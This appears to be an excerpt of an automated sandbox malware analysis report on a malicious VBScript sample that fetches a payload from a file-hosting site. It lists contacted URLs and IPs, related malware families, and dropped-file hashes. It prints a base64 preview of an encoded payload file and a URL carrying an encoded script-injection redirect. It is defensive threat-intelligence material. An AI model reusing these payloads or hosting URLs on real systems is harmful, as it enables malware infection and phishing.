                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://fs13n4.sendspaXpowershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.sendspace.com/pro/dl/exw2o1XRpowershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fs13n4.sendspace.compowershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sendspace.compowershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.sendspace.compowershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30250000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://fs13n4.sendspace.compowershell.exe, 00000001.00000002.2531372219.0000015C30440000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.170.105
                    		www.sendspace.comUnited States
                    		13335CLOUDFLARENETUSfalse
                    69.31.136.57
                    		fs13n4.sendspace.comUnited States
                    		3257GTT-BACKBONEGTTDEfalse
                    69.31.136.53
                    		fs12n1.sendspace.comUnited States
                    		3257GTT-BACKBONEGTTDEfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1446630
                    Start date and time:2024-05-23 18:23:06 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 51s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:time.vbs
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winVBS@13/9@3/3
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 77%
                    • Number of executed functions: 45
                    • Number of non-executed functions: 15
                    Cookbook Comments:
                    • Found application associated with file extension: .vbs

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 2656 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6536 because it is empty
                    • Execution Graph export aborted for target wab.exe, PID 3688 because there are no executed function
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: time.vbs

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    12:24:03API Interceptor149641x Sleep call for process: powershell.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    172.67.170.105file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                      69.31.136.57https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                        #W002UHNSOP.vbsGet hashmaliciousUnknownBrowse
                          1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                            1st_Payment.vbsGet hashmaliciousRevengeBrowse
                              QWMSA_Payment_Invoice0939.vbsGet hashmaliciousQuasarBrowse
                                QA6433_#002.vbsGet hashmaliciousnjRatBrowse
                                  69.31.136.53file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                    https://www.sendspace.com/pro/dl/hg4kq5Get hashmaliciousUnknownBrowse
                                      QRONSFGYUOPMWE.vbsGet hashmaliciousUnknownBrowse
                                        XZ22CfAOCN.exeGet hashmaliciousRedLine SmokeLoader Tofsee VidarBrowse
                                          eLc127EVdf.exeGet hashmaliciousRedLine SmokeLoader TofseeBrowse
                                            dHyQ66BhVK.exeGet hashmaliciousAmadey BazaLoader RedLine SmokeLoader Tofsee VidarBrowse
                                              rmmLc0TLEs.exeGet hashmaliciousAmadey BazaLoader RedLine SmokeLoader Tofsee VidarBrowse
                                                WBGAO0xAUv.exeGet hashmaliciousSmokeLoader Tofsee VidarBrowse
                                                  r5XFZVA30A.exeGet hashmaliciousAmadey BazaLoader Djvu RedLine SmokeLoader Tofsee VidarBrowse
                                                    9syta0IvuY.exeGet hashmaliciousBazaLoader RedLine SmokeLoader Tofsee VidarBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      www.sendspace.comhttps://www.sendspace.com/pro/dl/hg4kq5Get hashmaliciousUnknownBrowse
                                                      • 172.64.104.11
                                                      RFQ_#_1045981_-_MAA_D_Plant_Project_r01.exe.htmlGet hashmaliciousUnknownBrowse
                                                      • 172.67.161.115
                                                      https://www.sendspace.com/file/dwfkjzGet hashmaliciousFormBookBrowse
                                                      • 104.21.91.185
                                                      DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                                      • 172.64.202.8
                                                      SecuriteInfo.com.Trojan.KillProc2.9731.8373.22974.exeGet hashmaliciousGuLoaderBrowse
                                                      • 172.64.108.22
                                                      RdMr3o5vB2.exeGet hashmaliciousCryptOne, Djvu, Raccoon Stealer v2, SmokeLoader, SocelarsBrowse
                                                      • 172.67.141.102
                                                      New Order.exeGet hashmaliciousOski Stealer VidarBrowse
                                                      • 172.67.141.102
                                                      QzvyuYJlDX.exeGet hashmaliciousUnknownBrowse
                                                      • 104.21.41.17
                                                      XZ22CfAOCN.exeGet hashmaliciousRedLine SmokeLoader Tofsee VidarBrowse
                                                      • 172.64.173.34
                                                      eLc127EVdf.exeGet hashmaliciousRedLine SmokeLoader TofseeBrowse
                                                      • 104.21.81.195
                                                      fs13n4.sendspace.comQA6433_#002.vbsGet hashmaliciousnjRatBrowse
                                                      • 69.31.136.57
                                                      fs12n1.sendspace.comQRONSFGYUOPMWE.vbsGet hashmaliciousUnknownBrowse
                                                      • 69.31.136.53
                                                      1st_Payment_Copy.vbsGet hashmaliciousUnknownBrowse
                                                      • 69.31.136.53
                                                      QWMSA_Payment_Invoice0939.vbsGet hashmaliciousQuasarBrowse
                                                      • 69.31.136.53

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      GTT-BACKBONEGTTDEhttp://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                                      • 69.167.127.106
                                                      http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                      • 69.167.127.106
                                                      la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                      • 69.31.5.255
                                                      TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                                                      • 208.97.218.33
                                                      81#Uff09.exeGet hashmaliciousUnknownBrowse
                                                      • 23.62.176.141
                                                      YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                                      • 212.222.82.254
                                                      M88FIQFvyo.elfGet hashmaliciousMiraiBrowse
                                                      • 74.199.145.209
                                                      kuzen.vbsGet hashmaliciousUnknownBrowse
                                                      • 23.62.176.141
                                                      JvULMWY21C.elfGet hashmaliciousUnknownBrowse
                                                      • 66.227.51.92
                                                      NnS9ImJPht.elfGet hashmaliciousUnknownBrowse
                                                      • 154.15.125.182
                                                      CLOUDFLARENETUShttps://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                      • 104.17.2.184
                                                      http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3EGet hashmaliciousPhisherBrowse
                                                      • 188.114.96.3
                                                      ELECTRONIC RECEIPT_Europait.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.2.184
                                                      30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakniGet hashmaliciousUnknownBrowse
                                                      • 104.18.138.17
                                                      PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.26.12.205
                                                      https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharingGet hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      http://mi.michaels.com/p/cp/d278335eb0e4f32c/c?mi_u=0b5077a2e65ed331ee5d2de857007cdfe1a618cd5fa2ea47fde9894ad456adce&mi_ecmp=Certificate_Reminder_T4&url=//sritulasifarmstays.in/wp#acctspayable@magmutual.comGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.21.24.120
                                                      https://invitebowlcheckout.info/bowlGet hashmaliciousUnknownBrowse
                                                      • 172.67.197.146
                                                      GTT-BACKBONEGTTDEhttp://rb.gy/pcwqseGet hashmaliciousUnknownBrowse
                                                      • 69.167.127.106
                                                      http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                      • 69.167.127.106
                                                      la.bot.arm6.elfGet hashmaliciousUnknownBrowse
                                                      • 69.31.5.255
                                                      TxXQ106ErI.elfGet hashmaliciousMiraiBrowse
                                                      • 208.97.218.33
                                                      81#Uff09.exeGet hashmaliciousUnknownBrowse
                                                      • 23.62.176.141
                                                      YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                                      • 212.222.82.254
                                                      M88FIQFvyo.elfGet hashmaliciousMiraiBrowse
                                                      • 74.199.145.209
                                                      kuzen.vbsGet hashmaliciousUnknownBrowse
                                                      • 23.62.176.141
                                                      JvULMWY21C.elfGet hashmaliciousUnknownBrowse
                                                      • 66.227.51.92
                                                      NnS9ImJPht.elfGet hashmaliciousUnknownBrowse
                                                      • 154.15.125.182

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      30% Down Payment Slip.pdf_______________________________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      ordinul de cotatie.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      phish_alert_sp2_2.0.0.0-214.emlGet hashmaliciousUnknownBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      https://mydhl.express.dhl$tracking_link/Get hashmaliciousUnknownBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      https://github.com/ustaxes/UsTaxes/files/15378217/All.2023.Tax.Documents.zipGet hashmaliciousUnknownBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      https://one.acme.si/sagecn/fr.htmlGet hashmaliciousUnknownBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      https://organic.mushroomstrade%5B.%5Dcom/?aNqBNW=Nm&rd_DyKZBUOXd0TNevGZu3_F7iSKU5CUSZG11cnJheUBtZXJjaGFudHNjYXBpdGFsLmNvbQ==Get hashmaliciousUnknownBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.57
                                                      37f463bf4616ecd445d4a1937da06e19PI_230524.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      doc023571961504.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      Clear.7zGet hashmaliciousUnknownBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      SwiftCopy_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      rPurchaseOrderPO05232024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      msimg32.dllGet hashmaliciousRemcosBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      INVOICE.jsGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53
                                                      ORDER_245230978.pdf.jsGet hashmaliciousADWINDBrowse
                                                      • 172.67.170.105
                                                      • 69.31.136.53

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):11608
                                                      Entropy (8bit):4.8908305915084105
                                                      Encrypted:false
                                                      SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                      MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                      SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                      SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                      SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nlllulbnolz:NllUc
                                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\3582-490\wab.exe

                                                      Download File
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):475136
                                                      Entropy (8bit):6.119576160135665
                                                      Encrypted:false
                                                      SSDEEP:12288:S8Tx5KRZ18xtSP+szdcIugOO50MMEMOk7:SdmxtSP+sJ+O5FWP7
                                                      MD5:72AD21D191B58842334D32A381EA7FA8
                                                      SHA1:F7375F09855A7BCE9F7A152C75E84AAC69CAF828
                                                      SHA-256:87ABFAB7BF5E213FC9E63C7FA39EDFA6452EB5F7FDD668CD370D9CF4EA3EF729
                                                      SHA-512:78662231C7CE0D03374B69DFD32614786DC5BF0C8AD2BAADF2143F42BB03BD378632CC457DC414AA7E3D284674CC9151C39F90D71D9A5DD15DBA689B2283386D
                                                      Malicious:false
                                                      Preview:.g..N..#cr.Y...N[....E)..qR..B....?..:.\...q|.E'=....T5..X.<:r.go.f./...T.....0~a.#Xt8vG#B~.i..d.@n<...M.._.^...M%.s...D.....f..#....0......&.Am5....u.H3.w.2m....[..SsP\...!K..W...DYF!.O......8L....6.d.=SG.=.........3..Ux....Xr.Tj@.f...n....QFT .g.2C^...{...P.f...ba..M"..iU.....d..p...Z..9._...7.<......hC>.....aM....BZ..08..;."..=........<_!.}.....+.........F\......Q.tX..I]L....>.1..Q..<......f`.g.M.N.........!..!_...Q./.."yZ."[.yw.[...Mq-..G......?......./..#.{k...9>....LI?.A.I/......1...&.p..Vp..l..q..oO.st.R...f..._......?..d...........BR.......2&.....q1.z...x.\.V...J.M..0....,.y...GH./4o..;M...z.....qq..U.....n.....Pw.G.)9..........b...w.l...aJAV..o..../..Yg..l.h..PT>...i].i.JGkA/....X^..j..R.5.)...tA.k3..e.s|.,....),./......%..G(.(P.E.....B....6....)J#!....*1.>..#.h..d......vE9.......[[.0.....w......lJ....nE.h....E].6..,..B.%..#.B.:...X.g+^{O.r...u.......c.D.;.6=.?.u.6S....f.I..j...l.s.....%N.H.{..dW..).L.....d...!.....&......oR

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ipzz4ah.drh.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ncp0hsh.0ab.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jwj3x4nf.4vm.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nazlfk0t.rme.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\tmp5023.tmp

                                                      Download File
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8
                                                      Entropy (8bit):3.0
                                                      Encrypted:false
                                                      SSDEEP:3:+vo4:r4
                                                      MD5:27DA8B6EE2C5E189B88AB816E31C04DA
                                                      SHA1:9337D800B81694CF89240D9C6661ED6FAA352B4B
                                                      SHA-256:ABBB7417D552D8DF9FEB0D685C236BDD4F6617E11AE8B6DFAB201B7B5468238E
                                                      SHA-512:504EA5CB4A52FB928602264D7D5E11B85022EE08FCE1F8FE8421AA2A214326A384DAFB05EC01A52B43E7F306AFA62FF8B903770559633801876A383A36F615D1
                                                      Malicious:false
                                                      Preview:......&A

                                                      C:\Users\user\AppData\Roaming\Omrystninger.Dim

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):461284
                                                      Entropy (8bit):5.956027697684519
                                                      Encrypted:false
                                                      SSDEEP:12288:Tj0oKWcXrBbIUKPO/XLOgpK1JfvmI27kzBfds:TAT7dIUoOygpKLRHfG
                                                      MD5:6D9B6ACCCEEB8D1903FF212FE516A08E
                                                      SHA1:DDE8EF0BD8CEE4DD7593DE179183A6A0AFB5E1CC
                                                      SHA-256:2F65E63154EC396206D3CA6CE8AC0210B09598F0C61E6038161AD66FB5E80138
                                                      SHA-512:48031EFF35C6EF2DC0C05E750DDC960C6031FBB16F41843F0F0C01A0C59D76B71283793428F20974800FF880555606D6FBB4E1AD8F48220A38E9725ED6EAC420
                                                      Malicious:false
                                                      Preview:6wLVf3EBm7s3uBgAcQGb6wIXlQNcJARxAZvrAuFJuUY/ldjrAjQPcQGbgcECBWf56wL9unEBm4HpSET80XEBm+sCZ4pxAZtxAZu6XHJW6usCzjZxAZtxAZtxAZsxynEBm+sCLLCJFAvrAm4q6wIufNHi6wLQ3XEBm4PBBOsCBM7rAnctgfmJqkMFfMpxAZtxAZuLRCQE6wJ3iOsCVViJw3EBm+sC+n2Bw0N4IwNxAZtxAZu6LOm2K+sCBtdxAZuB8r6BKxDrAqrecQGbgcJul2LEcQGbcQGb6wJHJnEBm+sCL/VxAZuLDBDrAlhq6wIRBIkME+sCjd5xAZtC6wJrLnEBm4H6INkEAHXU6wIhgXEBm4lcJAzrAr/VcQGbge0AAwAAcQGbcQGbi1QkCOsCMsLrAo8Ri3wkBOsCG/jrAqaNievrAn8RcQGbgcOcAAAAcQGb6wJb3lNxAZtxAZtqQHEBm3EBm4nr6wJ7RusCkyHHgwABAAAAcF8F6wK+RXEBm4HDAAEAAHEBm3EBm1PrAvCo6wIxC4nr6wJuW3EBm4m7BAEAAOsC/4dxAZuBwwQBAADrAv87cQGbU3EBm3EBm2r/cQGb6wLjDoPCBXEBm3EBmzH2cQGbcQGbMclxAZtxAZuLGusCuJTrAhwPQXEBm+sCaXI5HAp18+sCaAdxAZtG6wKW++sCgMKAfAr7uHXc6wLlu+sCiBSLRAr8cQGb6wIcbinw6wLg5usC3Q3/0nEBm+sCKlS6INkEAOsCc+DrAtRyMcDrAue+6wJnRYt8JAxxAZtxAZuBNAdPby0I6wL3A+sCcp2DwARxAZtxAZs50HXkcQGb6wJp64n76wL+ZOsCytb/1+sCv4TrAhc8zpTYop9epO3Og6ERvGqszMN53g0a5sixVzCyy86G4L6G2Kz5AmA7VM6eM6+MOKntiCsgCP0O2u0pVv2JC2ItJL160Ik7Yi36h4eOiQtiLdwrdZKJjvrEKEbuxJmmTySB

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):5.0613947747922605
                                                      TrID:
                                                      • Visual Basic Script (13500/0) 100.00%
                                                      File name:time.vbs
                                                      File size:73'862 bytes
                                                      MD5:673fa3ac445c7ae448c49ef3d154b4e8
                                                      SHA1:097eaa21e81bf37a12a338e33366d429ef6a2ab9
                                                      SHA256:aeda53046f92e6a6f967262130c9238be1107224bd143399e6a66eae7ed2e401
                                                      SHA512:67d679238efe97f51db748c2c7bd916417f354d6fc8920c8df999e96bab63810707bd51473c4487db86f18e299831f0cc749a203c1ea58a5b3af0951ae3a406c
                                                      SSDEEP:1536:PddWp7iJTLvOMp4pR/1jvXgsVIx/4f3xeKG7lYY8zD+tNfvlEiEG9A:P+YrOMSn/Nv/VggheKebyiN3oG9A
                                                      TLSH:E7736DA5EB5909564C4A23ADFC815D82D67CC946012331A5FEC907DE630A8ACE3FD6CF
